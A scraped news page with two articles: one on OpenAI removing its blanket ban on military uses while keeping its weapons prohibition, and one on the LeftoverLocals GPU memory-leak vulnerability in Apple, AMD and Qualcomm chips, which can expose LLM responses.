According to Anna Makanju, OpenAI’s vice president of global affairs, “many people thought that [a previous blanket prohibition on military applications] would prohibit many of these use cases, which people think are very much aligned with what we want to see in the world.” OpenAI removed terms from its service agreement that previously blocked AI use in “military and warfare” situations, but the company still upholds a ban on its technology being used to develop weapons or to cause harm or property damage.

Under the “Universal Policies” section of OpenAI’s Usage Policies document, section 2 says, “Don’t use our service to harm yourself or others.” The prohibition includes using its AI products to “develop or use weapons.” Changes to the terms that removed the “military and warfare” prohibitions appear to have been made by OpenAI on January 10.

The shift in policy appears to align OpenAI more closely with the needs of various governmental departments, including the possibility of preventing veteran suicides. “We’ve been doing work with the Department of Defense on cybersecurity tools for open-source software that secures critical infrastructure,” Makanju said in the interview. “We’ve been exploring whether it can assist with (prevention of) veteran suicide.”

The efforts mark a significant change from OpenAI’s original stance on military partnerships, Bloomberg says. Meanwhile, Microsoft Corp., a large investor in OpenAI, already has an established relationship with the US military through various software contracts.

OpenAI opens the door for military uses but maintains AI weapons ban Read More »

just-10-lines-of-code-can-steal-ai-secrets-from-apple,-amd,-and-qualcomm-gpus

Just 10 lines of code can steal AI secrets from Apple, AMD, and Qualcomm GPUs

massive leakage —

Patching all affected devices, which include some Macs and iPhones, may be tough.

ai brain

MEHAU KULYK/Getty Images

As more companies ramp up development of artificial intelligence systems, they are increasingly turning to graphics processing unit (GPU) chips for the computing power they need to run large language models (LLMs) and to crunch data quickly at massive scale. Between video game processing and AI, demand for GPUs has never been higher, and chipmakers are rushing to bolster supply. In new findings released today, though, researchers are highlighting a vulnerability in multiple brands and models of mainstream GPUs—including Apple, Qualcomm, and AMD chips—that could allow an attacker to steal large quantities of data from a GPU’s memory.

The silicon industry has spent years refining the security of central processing units, or CPUs, so they don’t leak data in memory even when they are built to optimize for speed. However, since GPUs were designed for raw graphics processing power, they haven’t been architected to the same degree with data privacy as a priority. As generative AI and other machine learning applications expand the uses of these chips, though, researchers from New York-based security firm Trail of Bits say that vulnerabilities in GPUs are an increasingly urgent concern.

“There is a broader security concern about these GPUs not being as secure as they should be and leaking a significant amount of data,” Heidy Khlaaf, Trail of Bits’ engineering director for AI and machine learning assurance, tells WIRED. “We’re looking at anywhere from 5 megabytes to 180 megabytes. In the CPU world, even a bit is too much to reveal.”

To exploit the vulnerability, which the researchers call LeftoverLocals, attackers would need to already have established some amount of operating system access on a target’s device. Modern computers and servers are specifically designed to silo data so multiple users can share the same processing resources without being able to access each others’ data. But a LeftoverLocals attack breaks down these walls. Exploiting the vulnerability would allow a hacker to exfiltrate data they shouldn’t be able to access from the local memory of vulnerable GPUs, exposing whatever data happens to be there for the taking, which could include queries and responses generated by LLMs as well as the weights driving the response.

In their proof of concept, as seen in the GIF below, the researchers demonstrate an attack where a target—shown on the left—asks the open source LLM Llama.cpp to provide details about WIRED magazine. Within seconds, the attacker’s device—shown on the right—collects the majority of the response provided by the LLM by carrying out a LeftoverLocals attack on vulnerable GPU memory. The attack program the researchers created uses less than 10 lines of code.

An attacker (right) exploits the LeftoverLocals vulnerability to listen to LLM conversations.

Last summer, the researchers tested 11 chips from seven GPU makers and multiple corresponding programming frameworks. They found the LeftoverLocals vulnerability in GPUs from Apple, AMD, and Qualcomm and launched a far-reaching coordinated disclosure of the vulnerability in September in collaboration with the US-CERT Coordination Center and the Khronos Group, a standards body focused on 3D graphics, machine learning, and virtual and augmented reality.

The researchers did not find evidence that Nvidia, Intel, or Arm GPUs contain the LeftoverLocals vulnerability, but Apple, Qualcomm, and AMD all confirmed to WIRED that they are impacted. This means that well-known chips like the AMD Radeon RX 7900 XT and devices like Apple’s iPhone 12 Pro and M2 MacBook Air are vulnerable. The researchers did not find the flaw in the Imagination GPUs they tested, but others may be vulnerable.

Just 10 lines of code can steal AI secrets from Apple, AMD, and Qualcomm GPUs Read More »